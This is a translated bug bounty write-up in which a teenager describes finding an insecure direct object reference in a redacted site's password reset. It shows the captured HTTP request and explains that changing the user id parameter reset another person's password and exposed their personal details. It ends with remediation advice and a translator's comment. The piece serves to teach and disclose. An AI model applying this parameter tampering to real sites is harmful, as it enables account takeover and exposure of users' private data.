Small knowledge, big challenge! This article is participating in the creation activity of “Essential Tips for Programmers”. This article has participated in the “Digitalstar Project” and won a creative gift package to challenge the creative incentive money.
- IDOR to Account Takeover: My First Bug Bounty write-up at the Age of 16
- Originally written by wolfishLamb
- Translator: SHEEP in Wolf’s skin
Over the course of the year, I’ve been learning a little bit about Web penetration testing, on and off, by watching tutorials and reading articles. However, after testing several websites, I found nothing. I have a background in programming, but this is a new field for me.
Main()
A few days ago, a company was about to launch a website about subscription management. The fire in my heart rekindled. I’m going to try.
I went to the login screen of the website:
I clicked reset password and a link was sent to my email.
A funny thing happened. When I opened the link and submitted my new password, I found something in the Burp Suite:
POST /reactivate/password HTTP/2 Host: redacted.com Cookie:
Content-Length: 301 sec-CH-ua: “Chromium”; V = “91”, “the Not; A Brand “; V = “99” Accept: application/json, text/javascript, /; Q = 0.01 X – Csrf Token: 3 c7snxdszwhzsevj6kchsrkng3yfquls3n8tl1hl X – Requested – With: XMLHttpRequest Sec – Ch – Ua – Mobile:? 0 User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-type: application/x-www-form-urlencoded; charset=UTF-8 Origin: redacted.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: Redacted.com/verify/reac… Accept-Encoding: gzip, deflate Accept-Language: en-US,en; Q = 0.9 Connection: close
id=201&password=newpassword&confirm_password=newpassword
I recognize that ID parameter — it’s my ID. Emmm, maybe I can do IDOR attacks? After that, I changed 201 to 200. Bang, it’s done!
I was redirected to the victim’s dashboard page, and HIS password had been changed by me. Emails, real names and phone numbers were leaked!
commentary
When a user password is changed, the server accesses objects in its internal database directly using identifiers (id in this case) from the client without controlling access or verifying identity. This can lead to issues such as account takeovers/permission overruns and can have a serious impact on the site owner.
— Wikipedia (with changes)
The key to review
- Never trust any input from the user, verify it every time.
- Minimize the amount of data sent to the server.
Thanks for reading!
The translator’s note:
As far as I’m concerned, the bar for being a hacker is really low, and this article is an example — you don’t even need to know code. But don’t think this site is too lame, I’ve seen more than 10 reports of this type of bug (including some local government sites). In many cases, those developers often only learn a few courses on the rush to work, the development of the website is not immune to bugs, but the consequences of nature by us passive users bear. I hope you can pay more attention to network security and improve the level of security related technology. Of course, I will share more core information about penetration testing with you when there is an opportunity. Please look forward to it.
More articles on penetration testing can be found here: Pentester.land /list-of-bug… . The site collects bug reports written by “bug-bounty hunters” from Facebook, Google and other Internet giants.